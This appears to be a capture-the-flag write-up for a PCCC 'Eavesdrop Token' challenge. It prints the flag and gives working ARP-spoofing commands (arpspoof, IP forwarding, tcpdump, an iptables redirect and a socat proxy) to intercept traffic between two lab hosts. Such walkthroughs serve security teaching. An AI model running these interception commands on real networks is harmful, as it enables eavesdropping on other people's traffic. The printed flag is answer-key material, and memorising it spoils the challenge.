master
Raw Download raw file

Token 1: Eavesdrop Token

Token: PCCC{Ugh_Math_Homework_32_42fb}

Objective

Intercept the token sent by mathclient.pccc to mathserver.pccc on port 9000.

Hosts

  • mathclient.pccc: 10.0.91.132
  • mathserver.pccc: 10.0.91.130

Method: ARP Spoofing + Passive Capture

Step 1: Enable IP forwarding

sysctl -w net.ipv4.ip_forward=1

Step 2: ARP spoof both directions

arpspoof -i eth1 -t 10.0.91.132 10.0.91.130 &
arpspoof -i eth1 -t 10.0.91.130 10.0.91.132 &

Step 3: Capture traffic

Option A - tcpdump:

tcpdump -i eth1 -A host 10.0.91.132 and port 9000

Option B - socat transparent proxy:

iptables -t nat -A PREROUTING -i eth1 -s 10.0.91.132 -d 10.0.91.130 -p tcp --dport 9000 -j REDIRECT --to-port 9000
socat -v TCP-LISTEN:9000,fork,reuseaddr TCP:10.0.91.130:9000

Step 4: Wait for connection

The mathclient connects periodically. The first message it sends is:

Eavesdrop Token: PCCC{Ugh_Math_Homework_32_42fb}

Why It Works

ARP spoofing tells both hosts that your MAC address belongs to the other host’s IP. Traffic flows through your machine, and with IP forwarding enabled, it gets relayed transparently. You can passively observe or actively intercept.

Cleanup

pkill arpspoof
iptables -t nat -D PREROUTING -i eth1 -s 10.0.91.132 -d 10.0.91.130 -p tcp --dport 9000 -j REDIRECT --to-port 9000